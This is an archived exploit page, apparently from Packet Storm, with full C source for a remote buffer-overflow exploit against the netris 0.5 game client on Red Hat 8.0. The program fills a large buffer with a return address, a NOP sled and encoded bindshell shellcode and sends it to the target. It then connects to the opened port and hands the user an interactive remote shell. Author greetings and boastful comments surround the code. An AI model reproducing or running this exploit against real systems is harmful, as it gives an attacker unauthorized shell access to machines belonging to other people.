Remote exploit for netris version 0.5 on RedHat 8.0 that makes use of a buffer overflow vulnerability where a client connecting to an untrusted netris server could be sent an unusually long data packet, which would be copied into a fixed-length buffer without bounds checking.
f8edfa8276857fffd804744d1421a08844b4eda9116d04980bca6788d879b5db/*
01010101010101010101010101010101010101010101010101010101010101010101010101
0
>>Netris v 0.5 Remote exploit for Red Hat 8.0 1
0
by 1
0
>>Shashank Pandey a.k.a <<=SupaHer0=>> 1
0
(reach_shash [at] linuxmail.org) 1
0
-> Greetz to ma bros : Hi_Tech_Assain , Rafa(leave NASA alone ;-) 1
0
0
-> lol@ that e-security fair in Delhi...... what a joke ! 1
0
-> Love to tha babes in Delhi... j00 r getting bettah and bettah 1
each passing day.... ;-) 0
0
1
0101010101010101010101010101010101010101010101010101010101010101010101010
*/
#include<stdio.h>
#include<stdlib.h>
#include<netdb.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#define MYBUF 10000
#define RETADDR (0x08050c00+70) // Red Hat 8.0
#define MYPORT 9284
/* Hie Teso ;-) */
void shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
char *cmd="/bin/uname -a;id\n";
send(sock,cmd,strlen(cmd),0);
while (1)
{
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds))
{ l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
write (1,buf, l); }
}
}
static char hellcode[]= /* bindshell(45295)by netric ; wait for mine.. */
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
"\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
"\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
"\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
"\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
"\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
"\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
"\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
"\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
"\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";
//who wants to know..who wants to know.. bad men..
int main(int argc , char **argv)
{
struct sockaddr_in rem_addr;
struct hostent *h;
int i,fd,newfd,sock;
char buffer[MYBUF];
printf("\n================================\n");
printf("\nNetris 0.5 buffer overflow sploit\n");
printf("by Shashank a.k.a <<=SupaHer0=>>\n");
//printf("Usage : %s <I.P.>\n\n" , argv[1]);
printf("\n================================\n");
if(argc<2)
{printf("Usage: %s <I.P.>\n\n" ,argv[0]);
exit(0);}
h=gethostbyname(argv[1]);
if(h=NULL)
{printf("%s : unknown host %s" , argv[1] );
exit(1);}
rem_addr.sin_family=AF_INET;
rem_addr.sin_addr.s_addr=inet_addr(argv[1]);
rem_addr.sin_port=htons(MYPORT);
for(i=0;i<MYBUF;i+=4)
{
*(long *)&buffer[i]=RETADDR;
}
//leave the first 68 bytes alone, they will be turned to zero!
memset(buffer,'S',68);
//lets have a NOP slide ready..
memset(buffer+68,0x90,4096);
//shellcode
memcpy(buffer+68+4096,hellcode,strlen(hellcode));
fd=socket(AF_INET,SOCK_STREAM,0);
connect(fd,(struct sockaddr *)&rem_addr,sizeof(rem_addr) );
newfd=send(fd,buffer,sizeof(buffer),0);
close(fd);
sleep(1);
rem_addr.sin_family = AF_INET;
rem_addr.sin_addr.s_addr = inet_addr(argv[1]);
rem_addr.sin_port = htons(45295);
if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("- Socket");
return(0);
}
if(connect(fd,(struct sockaddr *)&rem_addr, sizeof(rem_addr)) != 0)
{
printf("- oops! wtf? exploit failed?!.\n");
return(0);
}
printf("--- OH YEAh ! W3 G0T shell :-)..\n\n");
shell(fd);
return(0);
//oh..ok.. forgot to tell ya : This C0dE is BS7799 compliant .. ;-)
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed